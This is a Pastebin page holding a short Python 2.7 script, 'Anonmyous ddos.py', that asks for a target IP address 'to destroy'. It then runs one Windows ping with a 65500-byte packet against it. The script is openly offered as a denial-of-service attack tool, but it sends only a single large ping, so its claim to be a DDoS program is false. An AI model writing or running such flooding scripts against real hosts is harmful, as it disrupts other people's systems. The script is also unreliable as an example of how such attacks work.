Adm1n_0v3rride

Anonmyous ddos.py

Nov 21st, 2017
383
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.41 KB | None | 0 0
  1. #ddos program in python 2.7 by Adm1n_0v3ride (c) 2017
  2. #!/usr/bin/env python
  3.  
  4. import subprocess
  5.  
  6. #input the target ip address.
  7. target = raw_input("Please enter the ip address to destroy: ")
  8.  
  9. #open a child process and direct output to a pipe.
  10. command = subprocess.Popen(['ping',target,'-l','65500','-w','1','-n','1'], stdout=subprocess.PIPE)
  11.  
  12. #Run command
  13.  
  14. output = command.communicate()[0]
  15.  
  16. print output
Advertisement
Add Comment
Please, Sign In to add comment